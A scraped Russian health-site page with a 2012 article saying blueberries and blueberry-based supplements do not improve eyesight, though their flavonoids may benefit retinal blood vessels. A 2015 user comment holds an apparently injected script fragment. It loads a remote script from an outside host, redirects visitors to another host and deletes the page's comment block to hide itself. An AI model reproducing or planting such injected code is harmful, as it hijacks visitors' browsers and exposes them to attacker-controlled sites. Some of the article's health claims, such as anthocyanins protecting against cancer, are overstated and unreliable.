Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Черника: зрительный обман  >>  Черника: зрительный обман
 
Обратная связь
 

Черника: зрительный обман

Размер шрифта
15 января 2012 09:00
  • google_analytics: false
  • Нравится

Что только не написано на упаковках «лекарственных» препаратов на основе черники: спасут от всех степеней близорукости и чуть ли не от слепоты. Так ли это на самом деле, и действительно ли ягода помогает прозреть?

Полезные свойства черники

  • Как и многие ягоды, черника богата витаминами (С, В1, В2). Я этой ягоде есть и антоцианы – вещества, которые защищают нас от рака.
  • В ягодах черники мало калорий и много клетчатки. Что делает ее прекрасным диетическим продуктом.
  • Черника – лидер среди ягод по содержанию марганца. Этот элемент необходим нам для нормальной работы щитовидной железы, пищеварения и усвоения пищи. Кроме того, марганец способствует концентрации внимания и улучшает нашу память.

Черника для зрения: правда или миф?

Во время Второй мировой войны американские летчики, совершающие полеты, каждый день получали в столовой по стакану черники. Тогда врачи считали, что регулярное употребление черники улучшало способность летчиков видеть в темноте.

Прошло полвека, и миф о чудодейственном свойстве этих ягод наконец долетел до России. Желающие прозреть стали употреблять чернику килограммами во всех видах. На прилавках аптек появилось огромное количество препаратов на основе этих лесных ягод. И тогда врачи решили присмотреться к чернике повнимательнее, потому что прозревших среди едоков черники не было.

В 2004 году был проведен ряд клинических исследований, касающихся полезных свойств черники. В результате была выявлена неэффективность черники для зрения и всех сделанных на ее основе препаратов.

Еще один минус этой черники: хоть эта ягода и не ядовитая, было доказано, что в листьях растения содержатся вещества, которые могут вызвать отравление. Значит ли это, что черника абсолютно бесполезная для зрения ягода, и от нее нужно отказаться? Вовсе нет. Вылечить близорукость, дальнозоркость и глаукому она не поможет. Однако содержащиеся в чернике вещества флавоноиды улучшают состояние наших сосудов, и в том числе сосудов сетчатки глаза. Так что можно сказать, что косвенно эта ягода все же влияет на наше зрение.




  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Слайдшоу

1
Что выпить, чтобы лучше работать Лучшая еда для женщин. Часть 2
Перекусы, которые спасут ваше сердце 10 продуктов для похудения
Еда против старости. Часть 1 Супереда против морщин
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.